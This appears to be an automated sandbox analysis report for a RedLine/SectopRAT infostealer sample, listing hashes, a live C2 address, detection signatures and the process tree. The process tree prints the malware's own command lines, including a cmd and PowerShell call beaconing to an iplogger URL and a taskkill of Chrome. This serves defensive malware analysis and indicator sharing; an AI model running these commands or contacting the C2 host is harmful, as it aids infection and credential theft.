Analysis

  • max time kernel
    284s
  • max time network
    297s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/04/2023, 19:12

General

  • Target

    virus.exe

  • Size

    508KB

  • MD5

    43967615d9e0e19bc59d32fdb5afd7e4

  • SHA1

    491d185c5fb89a0b72c1d9c61364f35a6d381fb4

  • SHA256

    f296b101028093e2c43930229590375a8a73335d08022c28d9c1cf0f84efb5b8

  • SHA512

    c122f036aba5d8c4a23d28d7d225d2e654bbcd32dc8a00a046501882b8410b87343f24380c2ab639a81a84581a39d7eadd4ee5191d74991f9d546d862f6e5123

  • SSDEEP

    6144:PtZlz6dpdLXUJkD6NS/H34jUrJ5yrIkzGbnuMKcAXDguOZ4KZGMI9Pp2T041v:Vz6dpdoymNS/ojoAOuMPAzMGMIp0J5

Malware Config

Extracted

Family

redline

Botnet

MrPenguin

C2

86.38.225.74:16808

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 5 IoCs
  • Find unpacked information stealer based on crypto desktop apps 5 IoCs

    Detects infostealer.

  • Find unpacked information stealer based on crypto extension 5 IoCs

    Detects infostealer.

  • Find unpacked information stealer based on possible SQL query to retrieve browser data 5 IoCs

    Detects infostealer.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\virus.exe
    "C:\Users\Admin\AppData\Local\Temp\virus.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "build.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1124
      • C:\Users\Admin\AppData\Local\Temp\build.exe
        "build.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:572
      • C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
        "Yosdofwiqay.exe"
        3⤵
        • Executes dropped EXE
        PID:336
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1536
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {2DFD6DF9-EA9C-4CE4-AE18-3BF33843CAA3} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\SYSTEM32\CMD.EXE
      C:\Windows\SYSTEM32\CMD.EXE /c taskkill /im chrome.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:556
      • C:\Windows\system32\taskkill.exe
        taskkill /im chrome.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:836

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe

          Filesize

          558KB

          MD5

          61bb691f0c875d3d82521a6fa878e402

          SHA1

          e987b42ef3f2ae177e34fc77734f20a54298cae6

          SHA256

          6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

          SHA512

          2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

        • C:\Users\Admin\AppData\Local\Temp\build.exe

          Filesize

          95KB

          MD5

          0a62437e59df248af2eda97203611906

          SHA1

          b4407082f44e48389cf122e15cdbffd8f7e26619

          SHA256

          3fc8460a4875efb2ab36a9677d4119c6d473c829070290313dbf881bf84e86ae

          SHA512

          e2e95da15ad5afa28c309377288a26a73dd417c428abf10398ea4a35814fa8fbeed141100221df7097406610bbe445a932b40a4179ff3ed87f64c395afe0dddb

        • C:\Users\Admin\AppData\Local\Temp\nsy1BAD.tmp\ZXIFJ7G.dll

          Filesize

          6KB

          MD5

          293165db1e46070410b4209519e67494

          SHA1

          777b96a4f74b6c34d43a4e7c7e656757d1c97f01

          SHA256

          49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

          SHA512

          97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

        • memory/572-69-0x0000000000A60000-0x0000000000A7E000-memory.dmp

          Filesize

          120KB

        • memory/1536-73-0x0000000002710000-0x0000000002750000-memory.dmp

          Filesize

          256KB

        • memory/1536-72-0x0000000002710000-0x0000000002750000-memory.dmp

          Filesize

          256KB